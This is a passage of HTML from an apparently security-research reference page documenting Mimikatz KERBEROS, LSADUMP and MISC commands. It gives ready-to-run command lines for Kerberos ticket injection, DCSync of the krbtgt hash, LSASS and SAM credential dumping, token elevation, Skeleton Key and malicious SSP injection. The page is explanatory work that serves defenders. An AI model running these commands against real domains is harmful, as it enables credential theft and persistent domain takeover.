loading="lazy" decoding="async" class="alignnone wp-image-1695" src="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Kekeo-AskTGS-Get-CIFS-ADSDC02-with-EA-SIDHistory.jpg" alt="TrustTicket-v2-Kekeo-AskTGS-Get-CIFS-ADSDC02-with-EA-SIDHistory" width="784" height="183" srcset="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Kekeo-AskTGS-Get-CIFS-ADSDC02-with-EA-SIDHistory.jpg 638w, https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Kekeo-AskTGS-Get-CIFS-ADSDC02-with-EA-SIDHistory-300x70.jpg 300w" sizes="(max-width: 784px) 100vw, 784px" /></a></p> <p><b>Step 4: Inject the TGS file created in Step 3 and then access the targeted service with the spoofed rights.</b></p> <p><em>Kirbikator lsa c:\temp\tickets\CIFS.ADSDC02.lab.adsecurity.org.kirbi</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Kekeo-Kibikator-Inject-CIFS-ADSDC02-with-EA-SIDHistory-ADSDC02-AdminShareAccess.jpg"><img loading="lazy" decoding="async" class="alignnone wp-image-1696" src="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Kekeo-Kibikator-Inject-CIFS-ADSDC02-with-EA-SIDHistory-ADSDC02-AdminShareAccess.jpg" alt="TrustTicket-v2-Kekeo-Kibikator-Inject-CIFS-ADSDC02-with-EA-SIDHistory-ADSDC02-AdminShareAccess" width="845" height="187" srcset="https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Kekeo-Kibikator-Inject-CIFS-ADSDC02-with-EA-SIDHistory-ADSDC02-AdminShareAccess.jpg 700w, https://adsecurity.org/wp-content/uploads/2015/07/TrustTicket-v2-Kekeo-Kibikator-Inject-CIFS-ADSDC02-with-EA-SIDHistory-ADSDC02-AdminShareAccess-300x66.jpg 300w" sizes="(max-width: 845px) 100vw, 845px" /></a></p> <p><b><b>KERBEROS::Hash </b></b>&#8211; hash password to keys</p> <p><a id="KERBEROSList"></a><b><b>KERBEROS::List</b> &#8211;</b> List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user&#8217;s tickets.<b><br /> </b>Similar to functionality of &#8220;klist&#8221;.</p> <ul> <li>/export &#8211; export user tickets to files.</li> </ul> <p>Use <a href="#SEKURLSATickets">SEKURLSA::TICKETS</a> to dump Kerberos tickets for all authenticated users on the system.<br /> Note that there are circumstances where the user certificates won&#8217;t export. This requires running SEKURLSA::Tickets /export (with appropriate privileges).<br /> <a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1853" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge.png" alt="Mimikatz-Kerberos-Purge" width="650" height="127" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge.png 650w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge-300x59.png 300w" sizes="(max-width: 650px) 100vw, 650px" /></a></p> <p><b>KERBEROS::PTC</b> &#8211; pass the cache (NT6)<br /> *Nix systems like Mac OS, Linux,BSD, Unix, etc cache Kerberos credentials. This cached data can be copied off and passed using Mimikatz. Also useful for injecting Kerberos tickets in ccache files.</p> <p>A good example of Mimikatz&#8217;s kerberos::ptc is when <a href="https://adsecurity.org/?p=676">exploiting MS14-068 with PyKEK</a>. PyKEK generates a ccache file which can be injected with Mimikatz using kerberos::ptc.</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-PTC-PyKEK-ccacheFile.jpg" rel="attachment wp-att-2348"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-2348" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-PTC-PyKEK-ccacheFile.jpg" alt="Mimikatz-PTC-PyKEK-ccacheFile" width="1204" height="586" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-PTC-PyKEK-ccacheFile.jpg 1204w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-PTC-PyKEK-ccacheFile-300x146.jpg 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-PTC-PyKEK-ccacheFile-768x374.jpg 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-PTC-PyKEK-ccacheFile-1024x498.jpg 1024w" sizes="(max-width: 1204px) 100vw, 1204px" /></a></p> <p>&nbsp;</p> <p><a id="KERBEROSPTT"></a><b>KERBEROS::PTT</b> &#8211; pass the ticket<br /> After a <a href="https://adsecurity.org/?p=1667">Kerberos ticket is found</a>, it can be copied to another system and passed into the current session effectively simulating a logon without any communication with the Domain Controller. No special rights required.<br /> Similar to SEKURLSA::PTH (Pass-The-Hash).</p> <ul> <li>/filename &#8211; the ticket&#8217;s filename (can be multiple)</li> <li>/diretory &#8211; a directory path, all .kirbi files inside will be injected.</li> </ul> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2.png"><img loading="lazy" decoding="async" class="size-full wp-image-1887 alignnone" src="https://adsecurity.org/wp-content/uploads/2015/09/KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2.png" alt="KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2" width="862" height="242" srcset="https://adsecurity.org/wp-content/uploads/2015/09/KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2.png 862w, https://adsecurity.org/wp-content/uploads/2015/09/KerberosUnConstrainedDelegation-Mimikatz-PTT-LS-Ticket2-300x84.png 300w" sizes="(max-width: 862px) 100vw, 862px" /></a></p> <p><b>KERBEROS::Purge</b> &#8211; purge all Kerberos tickets<br /> Similar to functionality of &#8220;klist purge&#8221;. Run this command before passing tickets (PTC, PTT, etc) to ensure the correct user context is used.</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge.png"><img loading="lazy" decoding="async" class="size-full wp-image-1853 alignnone" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge.png" alt="Mimikatz-Kerberos-Purge" width="650" height="127" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge.png 650w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-Purge-300x59.png 300w" sizes="(max-width: 650px) 100vw, 650px" /></a></p> <p><b>KERBEROS::TGT</b> &#8211; get current TGT for current user.</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-TGT.png"><img loading="lazy" decoding="async" class="size-full wp-image-1854 alignnone" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-TGT.png" alt="Mimikatz-Kerberos-TGT" width="705" height="150" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-TGT.png 705w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Kerberos-TGT-300x64.png 300w" sizes="(max-width: 705px) 100vw, 705px" /></a></p> <p>&nbsp;</p> <h4><b><a id="LSADUMP"></a>LSADUMP</b></h4> <p>The LSADUMP Mimikatz Module interacts with the Windows Local Security Authority (LSA) to extract credentials. Most of these commands require either debug rights (privlege::debug) or local System. By default, the Administrators group has Debug rights. Debug still has to be &#8220;activated&#8221; by running &#8220;privilege::debug&#8221;.</p> <p><b>LSADUMP:Backupkeys<br /> </b>Requires Administrator rights.<b><br /> </b></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-BackupKeys.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1855" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-BackupKeys.png" alt="Mimikatz-LSADump-BackupKeys" width="471" height="219" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-BackupKeys.png 471w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-BackupKeys-300x139.png 300w" sizes="(max-width: 471px) 100vw, 471px" /></a></p> <p><b>LSADUMP::Cache</b> &#8211; Get the SysKey to decrypt NL$KM then MSCache(v2) (from registry or hives)<br /> Requires Administrator rights.<b><br /> </b></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Cache.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1856" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Cache.png" alt="Mimikatz-LSADump-Cache" width="778" height="151" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Cache.png 778w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Cache-300x58.png 300w" sizes="(max-width: 778px) 100vw, 778px" /></a></p> <p><b>LSADUMP::ChangeNTLM </b>&#8211; Ask a server to set a new password/ntlm for one user.</p> <p><strong><b>LSADUMP</b>::DCShadow</strong> &#8211; Push replication changes to a Domain Controller.  Read more at <a href="https://www.dcshadow.com/">DCShadow.com</a>.<br /> This requires full AD admin rights or KRBTGT pw hash.<br /> DCShadow temporarily sets the computer to be a &#8220;DC&#8221; for the purposes of replication:</p> <ul> <li>Creates 2 objects in the AD forest Configuration partition.</li> <li>Updates the SPN of the computer used to include &#8220;GC&#8221; (Global Catalog) and &#8220;E3514235-4B06-11D1-AB04-00C04FC2DCD2&#8221; (AD Replication). More info on Kerberos Service Principal Names in the <a href="https://adsecurity.org/?page_id=183">ADSecurity SPN section</a>.</li> <li>Pushes the updates to DCs via DrsReplicaAdd and KCC.</li> <li>Removes the created objects from the Configuration partition.</li> </ul> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3958" src="https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-init-01-1.jpg" alt="" width="570" height="518" srcset="https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-init-01-1.jpg 1010w, https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-init-01-1-300x272.jpg 300w, https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-init-01-1-768x697.jpg 768w" sizes="(max-width: 570px) 100vw, 570px" /></p> <p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-3955" src="https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-Push.jpg" alt="" width="1557" height="827" srcset="https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-Push.jpg 1557w, https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-Push-300x159.jpg 300w, https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-Push-768x408.jpg 768w, https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-Push-1024x544.jpg 1024w" sizes="(max-width: 1557px) 100vw, 1557px" /></p> <p>Temporary DC object in the Configuration partition<img loading="lazy" decoding="async" class="alignnone size-full wp-image-3956" src="https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-ConfigurationContainerChange-01.jpg" alt="" width="1397" height="313" srcset="https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-ConfigurationContainerChange-01.jpg 1397w, https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-ConfigurationContainerChange-01-300x67.jpg 300w, https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-ConfigurationContainerChange-01-768x172.jpg 768w, https://adsecurity.org/wp-content/uploads/2018/02/DCShadow-ConfigurationContainerChange-01-1024x229.jpg 1024w" sizes="(max-width: 1397px) 100vw, 1397px" /></p> <p><a id="LSADUMPDCSync"></a><a href="https://adsecurity.org/?p=1729"><b>LSADUMP::DCSync</b></a> &#8211; ask a DC to synchronize an object (get password data for account)<br /> <a href="https://adsecurity.org/?p=1729">Requires membership in Domain Administrator, domain Administrators, or custom delegation.<b></b></a></p> <p>A major feature added to Mimkatz in August 2015 is “DCSync” which effectively “impersonates” a Domain Controller and requests account password data from the targeted Domain Controller. DCSync was written by Benjamin Delpy and Vincent Le Toux. As of Mimikatz version 2.1 alpha 20160501, DCSync works with renamed domains.</p> <p>The exploit method prior to DCSync was to run Mimikatz or Invoke-Mimikatz on a Domain Controller to get the KRBTGT password hash to create Golden Tickets. With Mimikatz’s DCSync and the appropriate rights, the attacker can pull the password hash, as well as previous password hashes, from a Domain Controller over the network without requiring interactive logon or copying off the Active Directory database file (ntds.dit).</p> <p>Special rights are required to run DCSync. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. Note that Read-Only Domain Controllers are not only allowed to pull password data for users by default.</p> <p><b>How DCSync works:</b></p> <ol> <li>Discovers Domain Controller in the specified domain name.</li> <li>Requests the Domain Controller replicate the user credentials via <a href="https://msdn.microsoft.com/en-us/library/dd207691.aspx">GetNCChanges </a>(leveraging <a href="https://msdn.microsoft.com/en-us/library/cc228086.aspx">Directory Replication Service (DRS) Remote Protocol</a>)</li> </ol> <p>I have previously done some packet captures for <a href="http://blogs.metcorpconsulting.com/tech/?p=923">Domain Controller replication</a> and identified the intra-DC communication flow regarding how Domain Controllers replicate.</p> <p>The Samba Wiki describes the <a href="https://wiki.samba.org/index.php/DRSUAPI">DSGetNCChanges function</a>:</p> <p><i>“The client DC sends a DSGetNCChanges request to the server when the first one wants to get AD objects updates from the second one. The response contains a set of updates that the client has to apply to its NC replica. &#8230;<br /> When a DC receives a DSReplicaSync Request, then for each DC that it replicates from (stored in RepsFrom data structure) it performs a replication cycle where it behaves like a client and makes DSGetNCChanges requests to that DC. So it gets up-to-date AD objects from each of the DC’s which it replicates from.”</i></p> <p><a id="DCSync"></a><strong><span style="text-decoration: underline;">DCSync Options:</span></strong></p> <ul> <li>/all &#8211; DCSync pull data for the entire domain.</li> <li>/user &#8211; user id or SID of the user you want to pull the data for.</li> <li>/domain (optional) &#8211; FQDN of the Active Directory domain. Mimikatz will discover a DC in the domain to connect to. If this parameter is not provided, Mimikatz defaults to the current domain.</li> <li>/csv &#8211; export to csv</li> <li>/dc (optional) &#8211; Specify the Domain Controller you want DCSync to connect to and gather data.</li> </ul> <p>There&#8217;s also a /guid parameter.</p> <p><strong><span style="text-decoration: underline;">DCSync Command Examples:</span></strong></p> <p>Pull password data for the KRBTGT user account in the rd.adsecurity.org domain:<br /> <em>Mimikatz &#8220;lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt&#8221; exit</em></p> <p>Pull password data for the Administrator user account in the rd.adsecurity.org domain:<br /> <em>Mimikatz &#8220;lsadump::dcsync /domain:rd.adsecurity.org /user:Administrator&#8221; exit</em></p> <p>Pull password data for the ADSDC03 Domain Controller computer account in the lab.adsecurity.org domain:<br /> <em>Mimikatz  &#8220;lsadump::dcsync /domain:lab.adsecurity.org /user:adsdc03$&#8221; exit</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-DCSync.jpg"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1822" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-DCSync.jpg" alt="Mimikatz-LSADump-DCSync" width="691" height="491" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-DCSync.jpg 691w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-DCSync-300x213.jpg 300w" sizes="(max-width: 691px) 100vw, 691px" /></a></p> <p><b>LSADUMP::LSA</b> &#8211; Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use /patch for a subset of data, use /inject for everything. <em>Requires System or Debug rights.</em></p> <ul> <li>/inject &#8211; Inject LSASS to extract credentials</li> <li>/name &#8211; account name for target user account</li> <li>/id &#8211; RID for target user account</li> <li>/patch &#8211; patch LSASS.</li> </ul> <p>Often service accounts are members of Domain Admins (or equivalent) or a Domain Admin was recently logged on to the computer an attacker dump credentials from. Using these credentials, an attacker can gain access to a Domain Controller and get all domain credentials, including the KRBTGT account NTLM hash which is used to create Kerberos Golden Tickets.</p> <p>Command:  mimikatz lsadump::lsa /inject exit</p> <p>Dumps credential data in an Active Directory domain when run on a Domain Controller.<br /> Requires administrator access (with debug rights) or Local SYSTEM rights</p> <p>The account with RID 502 is the KRBTGT account and the account with RID 500 is the default administrator for the domain.</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-LSA.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1823" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-LSA.png" alt="Mimikatz-LSADump-LSA" width="413" height="595" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-LSA.png 413w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-LSA-208x300.png 208w" sizes="(max-width: 413px) 100vw, 413px" /></a></p> <p>Here&#8217;s the result when running LSADUMP::lsa /patch which only dumps the NTLM password hashes.</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/01/InvokeMimikatz-DumpADdb-KRBTGT3.png"><img loading="lazy" decoding="async" style="background-image: none; padding-top: 0px; padding-left: 0px; display: inline; padding-right: 0px; border-width: 0px;" title="InvokeMimikatz-DumpADdb-KRBTGT" src="https://adsecurity.org/wp-content/uploads/2015/01/InvokeMimikatz-DumpADdb-KRBTGT_thumb3.png" alt="InvokeMimikatz-DumpADdb-KRBTGT" width="580" height="653" border="0" /></a></p> <p><a id="LSADUMPNetSync"></a><strong>LSADUMP::NetSync</strong></p> <p>NetSync provides a simple way to use a DC computer account password data to impersonate a Domain Controller via a Silver Ticket and DCSync the target account&#8217;s information including the password data.</p> <p><b><b>LSADUMP::RpData</b></b></p> <p><a id="LSADUMPSAM"></a><b>LSADUMP::SAM</b> &#8211; get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts.<br /> <em>Requires System or Debug rights.</em><br /> It contains NTLM, and sometimes LM hash, of users passwords. It can work in two modes: online (with SYSTEM user or token) or offline (with SYSTEM &amp; SAM hives or backup).</p> <p>Requires administrator access (with debug rights) or Local SYSTEM rights when run against an online SAM.</p> <p><em>Getting an impersonated SYSTEM token: Mimikatz &#8220;PRIVILEGE::Debug&#8221; &#8220;TOKEN::elevate&#8221;<br /> </em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-SAM.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1824" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-SAM.png" alt="Mimikatz-LSADump-SAM" width="378" height="202" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-SAM.png 378w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-SAM-300x160.png 300w" sizes="(max-width: 378px) 100vw, 378px" /></a></p> <p><b>LSADUMP::Secrets</b> &#8211; get the SysKey to decrypt SECRETS entries (from registry or hives).<br /> <em>Requires System or Debug rights.</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Secrets.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1825" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Secrets.png" alt="Mimikatz-LSADump-Secrets" width="841" height="463" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Secrets.png 841w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Secrets-300x165.png 300w" sizes="(max-width: 841px) 100vw, 841px" /></a></p> <p><b>LSADUMP::SetNTLM </b>&#8211; Ask a server to set a new password/ntlm for one user.</p> <p><a id="LSADUMPTrust"></a><a href="https://adsecurity.org/?p=1588"><b>LSADUMP::Trust</b></a> &#8211; Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly).<br /> <em>Requires System or Debug rights.</em></p> <p>Extracts data from Active Directory for existing trust relationships for the domain. The trust key (password) is displayed as well.</p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Trust.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1826" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Trust.png" alt="Mimikatz-LSADump-Trust" width="844" height="640" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Trust.png 844w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-LSADump-Trust-300x227.png 300w" sizes="(max-width: 844px) 100vw, 844px" /></a></p> <p>&nbsp;</p> <h4><b><a id="MISC"></a>MISC</b></h4> <p>The MISC Mimikatz module is kind of a catch-all for commands that don&#8217;t quite fit elsewhere.<br /> The most well known commands in this module are MISC::AddSID, MISC::MemSSP, and MISC::Skeleton.</p> <p><a id="MISCAddSid"></a><a href="https://adsecurity.org/?p=1772"><b>MISC::AddSid</b></a> &#8211; Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID).<br /> <em>Requires System or Debug rights.</em></p> <p><em>NOTE: ADDSID has moved to the SID module in the 2.1 release branch.</em><br /> <a href="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-AddSIDHistory-BobaFett-ADSADministrator1.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1898" src="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-AddSIDHistory-BobaFett-ADSADministrator1.png" alt="SneakyPersistence-AddSIDHistory-BobaFett-ADSADministrator" width="661" height="204" srcset="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-AddSIDHistory-BobaFett-ADSADministrator1.png 661w, https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-AddSIDHistory-BobaFett-ADSADministrator1-300x93.png 300w" sizes="(max-width: 661px) 100vw, 661px" /></a><a href="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-AddSIDHistory-GetUSerInfo-BobaFett1.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1897" src="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-AddSIDHistory-GetUSerInfo-BobaFett1.png" alt="SneakyPersistence-AddSIDHistory-GetUSerInfo-BobaFett" width="517" height="192" srcset="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-AddSIDHistory-GetUSerInfo-BobaFett1.png 517w, https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-AddSIDHistory-GetUSerInfo-BobaFett1-300x111.png 300w" sizes="(max-width: 517px) 100vw, 517px" /></a></p> <p><b>MISC::Cmd</b> &#8211; Command Prompt (without DisableCMD).<br /> <em>Requires Administrator rights.</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-CMD.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1827" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-CMD.png" alt="Mimikatz-Misc-CMD" width="676" height="394" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-CMD.png 676w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-CMD-300x175.png 300w" sizes="(max-width: 676px) 100vw, 676px" /></a></p> <p><b>MISC::Compressme </b>&#8211; Compresses Mimikatz file to a new file called &#8220;mimikatz_x64.compressed&#8221;<em><br /> </em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-CompressMe.jpg" rel="attachment wp-att-2693"><img loading="lazy" decoding="async" class="alignnone wp-image-2693" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-CompressMe.jpg" alt="Mimikatz-Misc-CompressMe" width="340" height="71" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-CompressMe.jpg 459w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-CompressMe-300x63.jpg 300w" sizes="(max-width: 340px) 100vw, 340px" /></a></p> <p><b>MISC::Detours</b> &#8211; (<em><strong>experimental</strong></em>) Try to enumerate all modules with Detours-like hooks<br /> <em>Requires Administrator rights.</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Detours.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1828" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Detours.png" alt="Mimikatz-Misc-Detours" width="538" height="512" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Detours.png 538w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Detours-300x286.png 300w" sizes="(max-width: 538px) 100vw, 538px" /></a></p> <p><a id="MISCMemSSP"></a><b>MISC::MemSSP</b> &#8211; Inject a malicious Windows SSP to log locally authenticated credentials by patching LSASS in memory with new SSP &#8211; no reboot required (rebooting clears the memssp Mimikatz injects). This <a href="https://adsecurity.org/?p=1760">post on Mimikatz SSP describes in-memory patching as well as more persistent SSP techniques</a>.<br /> Requires Administrator rights.<a href="https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_Analysis_of_Malicious_SSP.pdf"><br /> </a><a href="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-EnableMimiSSP-MemSSP-011.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1899" src="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-EnableMimiSSP-MemSSP-011.png" alt="SneakyPersistence-EnableMimiSSP-MemSSP-01" width="639" height="191" srcset="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-EnableMimiSSP-MemSSP-011.png 639w, https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-EnableMimiSSP-MemSSP-011-300x90.png 300w" sizes="(max-width: 639px) 100vw, 639px" /></a><a href="https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_Analysis_of_Malicious_SSP.pdf"><br /> </a><a href="https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_Analysis_of_Malicious_SSP.pdf">Mandiant presentation on MemSSP</a></p> <p><strong>MISC::MFLT</strong> &#8211; Gathers details on loaded drivers, including driver altitude.<br /> Available starting with Mimikatz v2.1.1 (11/28/2017).</p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3814" src="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Misc-Mflt-01.png" alt="" width="259" height="177" srcset="https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Misc-Mflt-01.png 397w, https://adsecurity.org/wp-content/uploads/2017/11/Mimikatz-Misc-Mflt-01-300x205.png 300w" sizes="(max-width: 259px) 100vw, 259px" /></p> <p><b>MISC::Ncroutemon</b> &#8211; Juniper Manager (without DisableTaskMgr)</p> <p><b>MISC::Regedit</b> &#8211; Registry Editor (without DisableRegistryTools)<br /> <em>Requires Administrator rights.</em></p> <p><a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Regedit.jpg" rel="attachment wp-att-2162"><img loading="lazy" decoding="async" class="alignnone wp-image-2162" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Regedit.jpg" alt="Mimikatz-Misc-Regedit" width="642" height="209" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Regedit.jpg 1288w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Regedit-300x98.jpg 300w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Regedit-768x250.jpg 768w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Regedit-1024x333.jpg 1024w" sizes="(max-width: 642px) 100vw, 642px" /></a></p> <p><a id="MISCSkeleton"></a><a href="https://adsecurity.org/?p=1275"><b>MISC::Skeleton</b></a> &#8211; Inject Skeleton Key into LSASS process on Domain Controller.<br /> <em>Requires Administrator rights.</em><br /> This enables all user authentication to the Skeleton Key patched DC to use a &#8220;master password&#8221; (aka Skeleton Keys) as well as their usual password.<br /> <a href="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-EnableMimikatzSkeleton.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-1900" src="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-EnableMimikatzSkeleton.png" alt="SneakyPersistence-EnableMimikatzSkeleton" width="642" height="283" srcset="https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-EnableMimikatzSkeleton.png 642w, https://adsecurity.org/wp-content/uploads/2015/09/SneakyPersistence-EnableMimikatzSkeleton-300x132.png 300w" sizes="(max-width: 642px) 100vw, 642px" /></a></p> <p><b>MISC::Taskmgr</b> &#8211; Task Manager (without DisableTaskMgr).<br /> <em>Requires Administrator rights.</em><br /> <a href="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Taskmgr.jpg"><img loading="lazy" decoding="async" class="alignnone wp-image-1901" src="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Taskmgr.jpg" alt="Mimikatz-Misc-Taskmgr" width="516" height="409" srcset="https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Taskmgr.jpg 619w, https://adsecurity.org/wp-content/uploads/2015/09/Mimikatz-Misc-Taskmgr-300x238.jpg 300w" sizes="(max-width: 516px) 100vw, 516px" /></a></p> <p><b>MISC::Wifi &#8211;<br /> </b>No longer in MISC. Likely moved to DPAPI:Wifi which may include similar functionality.<b><br /> </b></p> <p><b>MISC::WP</b></p> <p>&nbsp;</p> <h4><b><a id="MINESWEEPER"></a>MINESWEEPER</b></h4> <p><b>MINESWEEPER::Infos</b> &#8211; Provide mine info in minesweeper</p> <p>&nbsp;</p> <h4><b><a id="Net"></a>Net</b></h4> <p><b>NET::Alias</b></p> <p><img loading="lazy" decoding="async" class="alignnone wp-image-3808" 